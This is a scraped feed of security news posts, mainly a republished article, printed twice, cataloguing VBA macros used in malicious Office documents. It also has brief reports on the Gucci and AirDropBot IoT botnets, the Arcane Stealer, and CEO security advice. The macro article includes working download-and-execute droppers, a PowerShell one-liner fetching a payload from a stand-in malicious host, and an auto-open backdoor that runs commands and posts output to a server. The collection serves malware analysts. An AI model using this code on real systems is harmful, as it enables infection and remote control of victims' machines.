The massive NotPetya ransomware attack caused billions of dollars to organizations worldwide, the shipping giant Maersk and courier service FedEx incurred in over $300 million each. In April, the Aluminum producer Norsk Hydro estimated the cost of the massive attack cyber attack targeting the company in March at around $50 million.

Pierluigi Paganini

(SecurityAffairs – Demant, ransomware)

The post Danish company Demant expects to incur losses of up to $95 after cyber attack appeared first on Security Affairs.

Darknet hosting provider busted in underground NATO bunker

Police overcame not only digital defenses of the "bulletproof" provider CyberBunker but also barbed wire fences and surveillance cams.

Over A Billion Malicious Ad Impressions Exploit WebKit Flaw to Target Apple Users

The infamous eGobbler hacking group that surfaced online earlier this year with massive malvertising campaigns has now been caught running a new campaign exploiting two browser vulnerabilities to show intrusive pop-up ads and forcefully redirect users to malicious websites. To be noted, hackers haven't found any way to run ads for free; instead, the modus operandi of eGobbler attackers

Frequent VBA Macros used in Office Malware

The malware expert Marco Ramilli collected a small set of VBA Macros widely re-used to “weaponize” Maldoc (Malware Document) in cyber attacks.

Nowadays one of the most frequent cybersecurity threat comes from Malicious (office) document shipped over eMail or Instant Messaging. Some analyzed threats examples include: Step By Step Office Dropper DissectionSpreading CVS Malware over GoogleMicrosoft Powerpoint as Malware DropperMalHIDEInfo Stealing: a New Operation in the WildAdvanced All in Memory CryptoWorm, etc. Many analyses over the past few years taught that attackers love re-used code and they prefer to modify, obfuscate and finally encrypt already known code rather than writing from scratch new “attacking modules”. Here comes the idea to collect a small set of VBA Macros widely re-used to “weaponize” Maldoc (Malware Document) in contemporary cyber attacks.

Very frequently Office documents such as Microsoft Excel or Microsoft Doc are used as droppers. The core concept of a dropper is to Download and to Execute a third party payload (or a second stage) and often when you analyse Office dropper you would experience many layers of obfuscation. Obfuscation comes to make the analysis harder and harder, but once you overcome that stage you would probably see a VBA code looking like the following one.

Download And Execute an External Program

Private Sub DownloadAndExecute()
    Dim droppingURL As String
    Dim localPath As String
    Dim WinHttpReq As Object, oStream As Object
    Dim result As Integer
    
    droppingURL = "https://example.com/mal.exe"
    localPath = "c://asd.exe"
    
    Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP")
    WinHttpReq.setOption(2) = 13056 ' Ignore cert errors
    WinHttpReq.Open "GET", droppingURL, False ', "username", "password"
    WinHttpReq.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
    WinHttpReq.Send
    
    If WinHttpReq.Status = 200 Then
        Set oStream = CreateObject("ADODB.Stream")
        oStream.Open
        oStream.Type = 1
        oStream.Write WinHttpReq.ResponseBody
        oStream.SaveToFile localPath, 2  ' 1 = no overwrite, 2 = overwrite (will not work with file attrs)
        oStream.Close
        CreateObject("WScript.Shell").Run localPath, 0
    End If    
    
End Sub

The main idea behind this function (or sub-routine) is to invoke ServerXMLHTTP object to download a file from an external resource, to save it on local directory (ADODB.Stream object) and finally to execute it through the object WScript.Shell. You might find variants of this behavior, for example you might find controls over language to target specific countries or specific control on already infected machine, for example by avoiding network traffic if the file is already in the localPath. A possible very common way to add infection control on the same victim is, for example, by adding the following code before the HTTP request.

If Dir(localPath, vbHidden + vbSystem) = "" Then

Another very common way to weaponize Office files is to download and to execute a DLL instead of external file. In such a case we can invoke the exported DLL function directly from the VBA code as follows.

Drop And Execute External DLL

Private Sub DropAndRunDll()
    Dim dll_Loc As String
    dll_Loc = Environ("AppData") & "\Microsoft\Office"
    If Dir(dll_Loc, vbDirectory) = vbNullString Then
        Exit Sub
    End If
    
    VBA.ChDir dll_Loc
    VBA.ChDrive "C"
    
    'Download DLL
    Dim dll_URL As String
    dll_URL = "https://example.com/mal.dll"

    Dim WinHttpReq As Object
    Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
    WinHttpReq.Open "GET", dll_URL, False
    WinHttpReq.send

    myURL = WinHttpReq.responseBody
    If WinHttpReq.Status = 200 Then
        Set oStream = CreateObject("ADODB.Stream")
        oStream.Open
        oStream.Type = 1
        oStream.Write WinHttpReq.responseBody
        oStream.SaveToFile "Saved.asd", 2
        oStream.Close

        ModuleExportedInDLL.Invoke 
    End If
End Sub

Running DLL and External PE is not the only solution to run code on the victim machine, indeed we might use Powershell as well ! A nice way to execute PowerShell without direct access to PowerShell.exe is by using its DLLs, thanks to PowerShdll project this is possible, for example, in the following way

Dropping and Executing PowerShell

Sub RunDLL()
    DownloadDLL
    Dim Str As String
    Str = "C:\Windows\System32\rundll32.exe " & Environ("TEMP") & "\powershdll.dll,main . { Invoke-WebRequest -useb "YouWish" } ^| iex;"
    strComputer = "."
    Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
    Set objStartup = objWMIService.Get("Win32_ProcessStartup")
    Set objConfig = objStartup.SpawnInstance_
    Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
    errReturn = objProcess.Create(Str, Null, objConfig, intProcessID)
End Function


Sub DownloadDLL()
    Dim dll_Local As String
    dll_Local = Environ("TEMP") & "\powershdll.dll"
    If Not Dir(dll_Local, vbDirectory) = vbNullString Then
        Exit Sub
    End If
    
    Dim dll_URL As String
    #If Win64 Then
        dll_URL = "https://github.com/p3nt4/PowerShdll/raw/master/dll/bin/x64/Release/PowerShdll.dll"
    #Else
        dll_URL = "https://github.com/p3nt4/PowerShdll/raw/master/dll/bin/x86/Release/PowerShdll.dll"
    #End If
    
    Dim WinHttpReq As Object
    Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
    WinHttpReq.Open "GET", dll_URL, False
    WinHttpReq.send

    myURL = WinHttpReq.responseBody
    If WinHttpReq.Status = 200 Then
        Set oStream = CreateObject("ADODB.Stream")
        oStream.Open
        oStream.Type = 1
        oStream.Write WinHttpReq.responseBody
        oStream.SaveToFile dll_Local
        oStream.Close
    End If
End Sub

Or if you have direct access to PowerShell.exe you might use a simple inline script as the following one. This is quite common in today’s Office droppers as well.

Simple PowerShell Drop and Execute External Program

powershell  (New-Object System.Net.WebClient).DownloadFile('http://malicious.host:5000/payload.exe','microsoft.exe');Start-Process 'microsoft.exe';exit;

By applying those techniques (http and execute commands) you might decide to run commands on the victim machine such having a backdoor. Actually I did see this code few times related to manual attacks back in 2017. The code below comes from the great work made by sevagas.


Dim serverUrl As String ' Auto generate at startup Sub Workbook_Open() Main End Sub Sub AutoOpen() Main End Sub Private Sub Main() Dim msg As String serverUrl = "<<<TEMPLATE>>>" msg = "<<<TEMPLATE>>>" On Error GoTo byebye msg = PlayCmd(msg) SendResponse msg On Error GoTo 0 byebye: End Sub 'Sen data using http post' 'Note: 'WinHttpRequestOption_SslErrorIgnoreFlags, // 4 ' See https://msdn.microsoft.com/en-us/library/windows/desktop/aa384108(v=vs.85).aspx' Private Function HttpPostData(URL As String, data As String) 'data must have form "var1=value1&var2=value2&var3=value3"' Dim objHTTP As Object Set objHTTP = CreateObject("WinHttp.WinHttpRequest.5.1") objHTTP.Option(4) = 13056 ' Ignore cert errors because self signed cert objHTTP.Open "POST", URL, False objHTTP.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" objHTTP.setRequestHeader "Content-type", "application/x-www-form-urlencoded" objHTTP.SetTimeouts 2000, 2000, 2000, 2000 objHTTP.send (data) HttpPostData = objHTTP.responseText End Function ' Returns target ID' Private Function GetId() As String Dim myInfo As String Dim myID As String myID = Environ("COMPUTERNAME") & " " & Environ("OS") GetId = myID End Function 'To send response for command' Private Function SendResponse(cmdOutput) Dim data As String Dim response As String data = "id=" & GetId & "&cmdOutput=" & cmdOutput SendResponse = HttpPostData(serverUrl, data) End Function ' Play and return output any command line Private Function PlayCmd(sCmd As String) As String 'Run a shell command, returning the output as a string' ' Using a hidden window, pipe the output of the command to the CLIP.EXE utility... ' Necessary because normal usage with oShell.Exec("cmd.exe /C " & sCmd) always pops a windows Dim instruction As String instruction = "cmd.exe /c " & sCmd & " | clip" CreateObject("WScript.Shell").Run instruction, 0, True ' Read the clipboard text using htmlfile object PlayCmd = CreateObject("htmlfile").ParentWindow.ClipboardData.GetData("text") End Function

You probably will never see those codes like described here, but likely you will find many similarities with the Macros you are/will analyse in your next MalDoc analyses. Just remember that on one hand the attackers love to re-use code but on the other hand they really like to customize it. In your next VBA Macro analysis keep in mind those stereotypes and speed up your analysis.

Nowadays one of the most frequent cybersecurity threat comes from Malicious (office) document shipped over eMail or Instant Messaging. Some analyzed threats examples include: Step By Step Office Dropper DissectionSpreading CVS Malware over GoogleMicrosoft Powerpoint as Malware DropperMalHIDEInfo Stealing: a New Operation in the WildAdvanced All in Memory CryptoWorm, etc. Many analyses over the past few years taught that attackers love re-used code and they prefer to modify, obfuscate and finally encrypt already known code rather than writing from scratch new “attacking modules”. Here comes the idea to collect a small set of VBA Macros widely re-used to “weaponize” Maldoc (Malware Document) in contemporary cyber attacks.

Very frequently Office documents such as Microsoft Excel or Microsoft Doc are used as droppers. The core concept of a dropper is to Download and to Execute a third party payload (or a second stage) and often when you analyse Office dropper you would experience many layers of obfuscation. Obfuscation comes to make the analysis harder and harder, but once you overcome that stage you would probably see a VBA code looking like the following one.

Download And Execute an External Program

Private Sub DownloadAndExecute()
    Dim droppingURL As String
    Dim localPath As String
    Dim WinHttpReq As Object, oStream As Object
    Dim result As Integer
    
    droppingURL = "https://example.com/mal.exe"
    localPath = "c://asd.exe"
    
    Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP")
    WinHttpReq.setOption(2) = 13056 ' Ignore cert errors
    WinHttpReq.Open "GET", droppingURL, False ', "username", "password"
    WinHttpReq.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
    WinHttpReq.Send
    
    If WinHttpReq.Status = 200 Then
        Set oStream = CreateObject("ADODB.Stream")
        oStream.Open
        oStream.Type = 1
        oStream.Write WinHttpReq.ResponseBody
        oStream.SaveToFile localPath, 2  ' 1 = no overwrite, 2 = overwrite (will not work with file attrs)
        oStream.Close
        CreateObject("WScript.Shell").Run localPath, 0
    End If    
    
End Sub

The main idea behind this function (or sub-routine) is to invoke ServerXMLHTTP object to download a file from an external resource, to save it on local directory (ADODB.Stream object) and finally to execute it through the object WScript.Shell. You might find variants of this behavior, for example you might find controls over language to target specific countries or specific control on already infected machine, for example by avoiding network traffic if the file is already in the localPath. A possible very common way to add infection control on the same victim is, for example, by adding the following code before the HTTP request.

If Dir(localPath, vbHidden + vbSystem) = "" Then

Another very common way to weaponize Office files is to download and to execute a DLL instead of external file. In such a case we can invoke the exported DLL function directly from the VBA code as follows.

Drop And Execute External DLL

Private Sub DropAndRunDll()
    Dim dll_Loc As String
    dll_Loc = Environ("AppData") & "\Microsoft\Office"
    If Dir(dll_Loc, vbDirectory) = vbNullString Then
        Exit Sub
    End If
    
    VBA.ChDir dll_Loc
    VBA.ChDrive "C"
    
    'Download DLL
    Dim dll_URL As String
    dll_URL = "https://example.com/mal.dll"

    Dim WinHttpReq As Object
    Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
    WinHttpReq.Open "GET", dll_URL, False
    WinHttpReq.send

    myURL = WinHttpReq.responseBody
    If WinHttpReq.Status = 200 Then
        Set oStream = CreateObject("ADODB.Stream")
        oStream.Open
        oStream.Type = 1
        oStream.Write WinHttpReq.responseBody
        oStream.SaveToFile "Saved.asd", 2
        oStream.Close

        ModuleExportedInDLL.Invoke 
    End If
End Sub

Running DLL and External PE is not the only solution to run code on the victim machine, indeed we might use Powershell as well ! A nice way to execute PowerShell without direct access to PowerShell.exe is by using its DLLs, thanks to PowerShdll project this is possible, for example, in the following way

Dropping and Executing PowerShell

Sub RunDLL()
    DownloadDLL
    Dim Str As String
    Str = "C:\Windows\System32\rundll32.exe " & Environ("TEMP") & "\powershdll.dll,main . { Invoke-WebRequest -useb "YouWish" } ^| iex;"
    strComputer = "."
    Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
    Set objStartup = objWMIService.Get("Win32_ProcessStartup")
    Set objConfig = objStartup.SpawnInstance_
    Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
    errReturn = objProcess.Create(Str, Null, objConfig, intProcessID)
End Function


Sub DownloadDLL()
    Dim dll_Local As String
    dll_Local = Environ("TEMP") & "\powershdll.dll"
    If Not Dir(dll_Local, vbDirectory) = vbNullString Then
        Exit Sub
    End If
    
    Dim dll_URL As String
    #If Win64 Then
        dll_URL = "https://github.com/p3nt4/PowerShdll/raw/master/dll/bin/x64/Release/PowerShdll.dll"
    #Else
        dll_URL = "https://github.com/p3nt4/PowerShdll/raw/master/dll/bin/x86/Release/PowerShdll.dll"
    #End If
    
    Dim WinHttpReq As Object
    Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
    WinHttpReq.Open "GET", dll_URL, False
    WinHttpReq.send

    myURL = WinHttpReq.responseBody
    If WinHttpReq.Status = 200 Then
        Set oStream = CreateObject("ADODB.Stream")
        oStream.Open
        oStream.Type = 1
        oStream.Write WinHttpReq.responseBody
        oStream.SaveToFile dll_Local
        oStream.Close
    End If
End Sub

Or if you have direct access to PowerShell.exe you might use a simple inline script as the following one. This is quite common in today’s Office droppers as well.

Simple PowerShell Drop and Execute External Program

powershell  (New-Object System.Net.WebClient).DownloadFile('http://malicious.host:5000/payload.exe','microsoft.exe');Start-Process 'microsoft.exe';exit;

By applying those techniques (http and execute commands) you might decide to run commands on the victim machine such having a backdoor. Actually I did see this code few times related to manual attacks back in 2017. The code below comes from the great work made by sevagas.


Dim serverUrl As String ' Auto generate at startup Sub Workbook_Open() Main End Sub Sub AutoOpen() Main End Sub Private Sub Main() Dim msg As String serverUrl = "<<<TEMPLATE>>>" msg = "<<<TEMPLATE>>>" On Error GoTo byebye msg = PlayCmd(msg) SendResponse msg On Error GoTo 0 byebye: End Sub 'Sen data using http post' 'Note: 'WinHttpRequestOption_SslErrorIgnoreFlags, // 4 ' See https://msdn.microsoft.com/en-us/library/windows/desktop/aa384108(v=vs.85).aspx' Private Function HttpPostData(URL As String, data As String) 'data must have form "var1=value1&var2=value2&var3=value3"' Dim objHTTP As Object Set objHTTP = CreateObject("WinHttp.WinHttpRequest.5.1") objHTTP.Option(4) = 13056 ' Ignore cert errors because self signed cert objHTTP.Open "POST", URL, False objHTTP.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" objHTTP.setRequestHeader "Content-type", "application/x-www-form-urlencoded" objHTTP.SetTimeouts 2000, 2000, 2000, 2000 objHTTP.send (data) HttpPostData = objHTTP.responseText End Function ' Returns target ID' Private Function GetId() As String Dim myInfo As String Dim myID As String myID = Environ("COMPUTERNAME") & " " & Environ("OS") GetId = myID End Function 'To send response for command' Private Function SendResponse(cmdOutput) Dim data As String Dim response As String data = "id=" & GetId & "&cmdOutput=" & cmdOutput SendResponse = HttpPostData(serverUrl, data) End Function ' Play and return output any command line Private Function PlayCmd(sCmd As String) As String 'Run a shell command, returning the output as a string' ' Using a hidden window, pipe the output of the command to the CLIP.EXE utility... ' Necessary because normal usage with oShell.Exec("cmd.exe /C " & sCmd) always pops a windows Dim instruction As String instruction = "cmd.exe /c " & sCmd & " | clip" CreateObject("WScript.Shell").Run instruction, 0, True ' Read the clipboard text using htmlfile object PlayCmd = CreateObject("htmlfile").ParentWindow.ClipboardData.GetData("text") End Function

You probably will never see those codes like described here, but likely you will find many similarities with the Macros you are/will analyse in your next MalDoc analyses. Just remember that on one hand the attackers love to re-use code but on the other hand they really like to customize it. In your next VBA Macro analysis keep in mind those stereotypes and speed up your analysis.

The original post is available on Marco Ramilli’s blog:

About the author: Marco Ramilli, Founder of Yoroi

I am a computer security scientist with an intensive hacking background. I do have a MD in computer engineering and a PhD on computer security from University of Bologna. During my PhD program I worked for US Government (@ National Institute of Standards and Technology, Security Division) where I did intensive researches in Malware evasion techniques and penetration testing of electronic voting systems.

I do have experience on security testing since I have been performing penetration testing on several US electronic voting systems. I’ve also been encharged of testing uVote voting system from the Italian Minister of homeland security. I met Palantir Technologies where I was introduced to the Intelligence Ecosystem. I decided to amplify my cyber security experiences by diving into SCADA security issues with some of the most biggest industrial aglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cyber security defence center I’ve ever experienced ! Now I technically lead Yoroi defending our customers strongly believing in: Defence Belongs To Humans

Pierluigi Paganini

(SecurityAffairs – VBA macros, Office malware)

The post Frequent VBA Macros used in Office Malware appeared first on Security Affairs.

Gucci IOT Bot Discovered Targeting European Region

Security Labs discovered a new IOT bot named “GUCCI”. It seems like the IOT botnet is named after an Italian luxury brand of fashion and leather goods.

Analysis

The discovery came to exist during our reconnaissance and intelligence collection process.  The IOT threat detection engine picked the infection IP has shown below hosting number of bins for different architectures

Gucci

Figure 1: GUCCI Bot Binaries

All the bins were successfully downloaded and magic headers were analyzed to check the type of file. Figure 2 highlights how the GUCCI bot binaries are compiled.

Figure 2:  Bot: compiled Binaries

As you can see the output in Figure 2, all the Gucci bot binaries are “stripped”.  This means that when these binaries were compiled all the debug symbols were removed from these executables to reduce the size. Listing 1 highlights the Md5 hashes of the binaries being analyzed.

MD5 (arm) = b24e88da025e2e2519a96dd874e6ba8bMD5 (arm5) = 24ef4178e365c902cfdd53d0ea0d1dc2MD5 (arm6) = 5a5a27635570b2c3634cab62beadc951MD5 (arm7) = c1ef67719e9762fc46aeb28a064fe0aeMD5 (m68k) = 2b984677ab9ee264a2dae90ca994a2a6MD5 (mips) = a0e0da3ae1ad1b94f0626c3e0cb311adMD5 (mpsl) = ee26f791f724f92c02d976b0c774290dMD5 (ppc) = e16f594cbdd7b82d74f9abc65e0fe677MD5 (sh4) = a70d246e911fe52638595ea97ed07342MD5 (spc) = d1b719ab9b7be08ea418b47492108dfaMD5 (x86) = de94d4718127959a494fe8fbc4aa5b2a
Listing 1: MD5 Hashes of the Gucci Bit Binaries

The binaries were found to be obfuscated in nature. On further analysis, it was analyzed that the Gucci bot was connecting to the  remote IP on the  TCP port “5555” and transmitting the data accordingly.  Digging deeper, we found that the remote host running a custom telnet service on TCP port 5555 and exchanging commands with Gucci bots regularly. When a test connection was initiated on TCP port 5555  using telnet client on remote IP,  the successful connection acceptance resulted in requirement of credentials.

Compromising C&C

Without authentication credential, it was not possible to access the service.  Considering all scenarios, automated brute force and account cracking attempts were performed. The account credentials were successfully cracked and connection was initiated and accepted as credentials are accepted.

Figure 3 highlights that Gucci bot Command and Control panel was hijacked and privilege access was obtained.                                                                                                                     

Figure 3: Gucci C&C Bot Panel

The C&C listed out the different type of Denial of Service (DoS) attack types supported by the Gucci bot. The support scans are:

  • HTTP null scan
  • UDP flood
  • Syn flood
  • ACK flood
  • UDP flood with less protocol options
  • GRE IP flood
  • Value Source Engine specific flood

It was noticed that Gucci bot was in early stages of deployment.  It was also analyzed that  the botnet operator was monitoring all the access connections to the Gucci C&C.  As soon as the botnet operator realized that the C&C has been compromised, the TCP service was removed from the host and operator cleaned the directories and performed an additional set of operations to hide indicators and artefacts.  The binaries were distributed from the location as provided in Figure 4

Figure 4: Gucci Bot – Source of Distribution

Inference

A new IOT bot Gucci has been discovered and analyzed accordingly.  The botnet operator was found to be very proactive. The whole analysis and obtaining C&C  access was like an arms race.  The purpose of this research is to share the discovery details with the security research community so that extracted intelligence can be used to fingerprint, detect and prevent Gucci bot infections. It is anticipated the Gucci botnet is still in active phase and targeting European region. However, the attacks triggered by Gucci bot could be broad based or targeted depending on the requirements.

About the authors:

Aditya K Sood is a Cyber Security Expert and working in the field for more than 11 years now. His work can be found at: https://adityaksood.com;

Rohit Bansal is a Principal Security Researcher at SecNiche Security Labs

Pierluigi Paganini

(SecurityAffairs – malware, botnet)

The post Gucci IOT Bot Discovered Targeting European Region appeared first on Security Affairs.

Five questions every CEO should be asking about cybersecurity

Estimated reading time: 3 minutes

As the captain of the ship, the Chief Executive Officer (CEO) plays a very important role in how an enterprise addresses cybersecurity issues and concerns. When the CEO provides a buy-in towards making enterprise security safer, it trickles down as a new mindset for the entire organization.

The 9th Annual Cost of Cybercrime Study 2019 revealed a significant statistic – the average cost of cybercrime for an organization increased by $1.4 million to $13 million in 2019.

More than anything else, this is the most important statistic which illustrates why cybersecurity is one of the most important issues that a modern organization must deal with. It is no longer a question of IT or Information Security – it is a business issue as important as anything else which leaders need to deal with urgently.

But to create that mindset, what kind of questions should a CEO be asking? Here are five important ones:

  1. How prepared is the enterprise right now to handle cyber risks?

The CEO, as the most important leader in the company, must know and that too, in minute detail, about his company’s preparedness to current threats. The leadership must have detailed visibility of how the enterprise is dealing with these risks, what measures they are taking and also, what threats are slipping through the net. This question is the first starting point for the CEO and the answer to this question will provide a complete understanding of where the enterprise is currently placed when it comes to cybersecurity. On the basis of that, plans for the future can be made.

  1. Does the senior leadership buy into the current cybersecurity framework? If not, why?

CEOs head organizations but they can never be a one-person army. Great organizations surround CEOs with a team of competent leaders who come together to form one unified front. It is in the same way that a company’s senior leadership team comprising the C-suite must also showcase a united stand towards cybersecurity measures taken by the enterprise. This helps in better compliance and inculcation of a security-first mindset among employees. However, this is easier said than done and that is why a CEO must ask this question.

If the CEO finds out that this is not the case, the first step is to get the entire leadership team on board.

  1. What is our plan for responding to cybersecurity incidents? How regularly has it been tested?

Cybersecurity is not a zero-sum game – there is always a scope for malware to sneak through despite the best possible measures. This is why an Incident Response Plan comes in handy as it details the actions to be taken for different kind of incidents. The CEO must be aware of every intricate detail of this plan as in times of a crisis, they will need to show that they are in control. CEOs must also keep themselves abreast of how regularly this plan is tested so that they are aware of any shortcomings in it.

  1. Do the employees have a cybersecurity mindset?

Employees are the single biggest factor in cybersecurity preparedness for an enterprise. The CEO must be aware of the current culture of cybersecurity in the organization – are employees aware of the dangers that cyber threats may pose or do they still remain blissfully unaware? If the answer is the latter, the CEO must immediately put in place a plan to create a mindset of cybersecurity in the entire organization.

  1. How does the enterprise handle insider threats?

Cybersecurity is not always an external affair – in many cases, danger lurks within the enterprise in the form of insider threats and disgruntled employees. It is not just the InfoSec team that has to be aware of this  – the CEO must ask leading questions about this dangerous type of threat and the kind of the measures the company is taking to tackle this threat.

Creating a cybersecurity culture in an enterprise is not easy but investing in a strong enterprise solution goes a long way in protecting an organization from the varied threats that exist. Seqrite’s range of solutions enables security and greater productivity in the cybersecurity journey.  

The post Five questions every CEO should be asking about cybersecurity appeared first on Seqrite Blog.

Email is an open door for malicious actors looking to exploit businesses

There’s an alarming scale of risks businesses are up against in a time when email is proving an open door for cybercriminals and malicious actors looking to disrupt, exploit and destroy businesses, according to Wire. The report is developed in collaboration with global poker champion and astrophysicist, Liv Boeree. P​oker is a game of making calculated, strategic decisions in high-stakes situations. As such, Liv is able to draw parallels between the poker table and the … More

The post Email is an open door for malicious actors looking to exploit businesses appeared first on Help Net Security.

Exclusive: MalwareMustDie analyzes a new IoT malware dubbed Linux/ AirDropBot

After 2 years of waiting, MalwareMustDie returns with an excellent page of malware analysis of a new IoT malware: Linux/AirDropBot.

Yes, I have to confess, it was hard to wait all this time, but the reward it was worth it: unixfreaxjp is return, with a new, great page of reverse engeeniring published on the MalwareMustDie blog post: “MMD-0064-2019 – Linux/AirDropBot

And this is not only “the” Odisseus’s opinion, just because I can be addressed as a member of  MalwareMustDie crew: this last post IT IS a masterpiece technically speaking, because here unixfreaxjp reveals some unique and undocumented best practices in order to reverse Linux malware binaries (Intel and not Intel platforms), providing to every whitehat reverser many references and howtos to deal with ELF Linux malware, mixing theory and practice and showing how is incredibly useful the use of Radare r2 and Tsurgi distribution.

Don’t know if is because I have asked to my friend unixfreaxjp many times to publicly show how Radare r2 can be be used with great results, but after this post we can definitively state that, once again, Radare r2 has nothing to envy of the best commercial tools used in many reverse engineering tutorials that are available on Youtube.

In fact this time we have not a “simple” blog post, but a rich, strong and powerful technical lesson on how stripped binaries can be reversed even if they are “indeed” stripped.

Unixfreaxjp step by step leads the reader to understand how a malware code is build, which are the methods, which are the secrets, with are the hidden techniques used by the coders to hide and encrypt as much as possible the C2 address, how the operative commands coming from the C2 are parsed, and how almost everything can be reconstructed to get the source code back from any stripped binary.

The beginning of the story: another IoT malware in the wild?

But let’s go back to the beginning of the story when my very good friend @0xrb found in his honeypot this new “Mirai like” Linux malware, which has important differences with the Mirai implementation. He understood immediately that there was something strange in this new “Mirai variant”, to proposing the sample to MalwareMustDie team: here it is his early tweet.

It is possible to give a look also to the logs of the malware that @0xrb published on Pastebin: here a lot of information is made available during the running phase. One of them, for example, is the C2 server.

The C2 of the botnet was: 147.135.174.119

As unixfreaxjp states in his post, @0xrb has successfully submitted the sample to MalwareMustDie team in order to better analyze it, and the result is another great page of Linux malware reversing, that every malware analyst should read and re-read.

We will overfly the technical analysis because the MalwareMustDie post is extremely clear and explanatory in every single part of its analysis.

Coming to the core topic: IoT botnet threat and their ecosystem

New Linux developed malware aiming internet of things is happening a lot, and as previously mentioned, it has been driven by the money scheme that is fueling its botnet ecosystem as per previously posted in Security Affairs, this is still the main reason why new freshly coded malware in this sector is always coming up.

First spotted in the internet on August 3rd, 2019, a new Linux/AirDropBot has been reported, is a malware that has been built to aim many embedded Linux OS platform, it is meant to propagate its botnet into several originally coded and built for aiming the IoT used platforms. It’s still not in the final stage of development judging from some uncoded functions,  but the adversary mission is clear, to get as much Linux IoT infected as possible and get rid of his competitors. It was first detected as Mirai or Gafgyt like during the detection spotted in the first series of samples, and this may make researchers in Linux malware ignored its first existence.

So many processors are aimed by the malware, but if CPU like ARC Cores, Renesas SH, Motorola m68000, Altera Nios II, Tensilica Xtensa and Xilinx MicroBlaze CPU is aimed along with other generic cross-compiled CPU (MIPS/ARM/PPC/SPARC/Intel), the herder meant serious business to “pwn” the reachable IoTs. The binary is having two categories, the one that acts as bots and meant to infect the small devices and for bigger systems it has the worm-like vulnerability scanner aims CGI page on routers (in this version is aiming HTTP port 8080 on specific product CGI file) that can infect itself in a worm-like style along with the telnet scanning basis (attacking TCP port 23 or 2323).

The analysis made in MalwareMustDie blog’s recent post “MMD-0064-2019 – Linux/AirDropBot” is showing the latest binary sets, used by the adversaries behind this botnet. Scanner function for exploiting a certain router’s vulnerability is hardcoded and this threat is also aiming at other exploit too on older samples delivery. The overall idea is a known ones but the code is newly made.

Final considerations on the behavior to take in order to face this threat.

Internet of things are on improvement for its security quality, and governments all over the globe are seriously handling this, for example in the US the “Security Feature Recommendations for IoT Devices” by NIST is a good recommended plan, in the UK a voluntary code of practice (CoP) to help manufacturers boost the security of internet-connected devices that make up the internet of things (IoT) has been published, or in Japan the Project to Survey IoT Devices and to Alert Users has been started. Yet, there are a lot of products to handle and vulnerabilities for these products which are also researched at the same time by adversaries.
This makes IoT threat is still making a lot of issues since day-by-day new exploit issue actually comes up, old issues are re-used, unpatched segments are revealed and aimed.

Are we the wrong track then? I don’t think so. Yes, the process takes time and what we can do is keep on improving the detection on a new threat, containment, and response as prevention to strengthen the defense scheme for the platform, along with the parallel legal works on stopping adversaries. If we are committing to keep on doing these steps the adversaries will find more demerits than merits to keep on hammering is with their botnets.

About the Author: 

Odisseus – Independent Security Researcher involved in Italy and worldwide in topics related to hacking, penetration testing and development.

Pierluigi Paganini

(SecurityAffairs – AirDropBot, malware)

The post Exclusive: MalwareMustDie analyzes a new IoT malware dubbed Linux/ AirDropBot appeared first on Security Affairs.

Arcane Stealer V, a threat for lower-skilled adversaries that scares experts

Experts recently analyzed an information-stealing malware tracked as Arcane Stealer V that is very cheap and easy to buy in the Dark Web.

In July 2019, researchers at Fidelis Threat Research Team (TRT) analyzed a sample of Arcane Stealer V, a .net information-stealing malware that is easy to acquire in the dark web. The author of the malware is selling it on his own website and on the Lolzteam site on the Dark Web, the researchers also found cracked versions on multiple community discussion and file-sharing platforms.

The malware is quite cheap, it goes for just $9 on the Dark Web, and could be also used by lower-skilled adversaries. Due to the low-cost of the malware, experts believe that its popularity could rapidly increase.

“The Arcane Stealer is a .net information stealer. The malware is available as a graphical user interface (GUI) or users can purchase the code, making it easier for actors with novice skills to employ. It sells for 699 Rubles or approximately 9 US dollars.” reads the post published by the researchers. “There is also support available on Telegram along with other “helpful” bots.”

In early August, the researchers were able to track multiple instant messenger and social media accounts associated with a Russian-language actor that might be the author of the malware.

The malware is able to collect various data from victims, including operating system, browser information, cryptocurrency wallets and instant-messaging sessions from Telegram, Discord, and Pidgin, data (i.e. passwords, cookies and forms) from a several of browsers, including Chrome, Opera, Kometa, Orbitum, Comodo, Amigo, Torch and Yandex.

Arcane Stealer V could be used to steal documents, collect Steam gaming community data, logs detected virtual machine IPs, and data from FileZilla servers.

The threat actor behind the Arcane Stealer V also provides dashboards and statistics to show crooks that buy the malware the potential earnings.

Arcane Stealer V

When the malware runs, it takes a screenshot and then it creates a text log file of what was collected.

“When ran, the file collects data, takes a screenshot and then it creates a text log file of what was collected. It stores all of the information in a folder in %appdata%/local/{hwid}/.” continues the post. ” It uses the assigned hardware ID that the malware generates as the folder name and zip folder name.”

Then the malware sends the zipped file to the C2 server.

The researchers identified multiple Telegram and Twitter accounts with the handles “@arcanee_bot,” “@es3n1n” and “@SakariHack,” that were used to discuss how to build and distribute the malware. These accounts were all associated with the same Russian-language actor, a 21-year-old man that says to suffer a form of epilepsy.

“The actor associated with the malware appears to be a native Russian speaker, however it is unclear if the actor is currently located in Russia,” continues the analysis. “The actor’s information-stealer does not appear to limit potential targets. Analysts have observed the capability of Russian sites to be targeted in the malware.”

Experts pointed out that the malware unlike other threats doesn’t discriminate geo-location of the victims and could be used against any target.

“Based off current observation and analysis, Arcane Stealer and its developer(s) appear to be low-level threats.” conclude the experts.

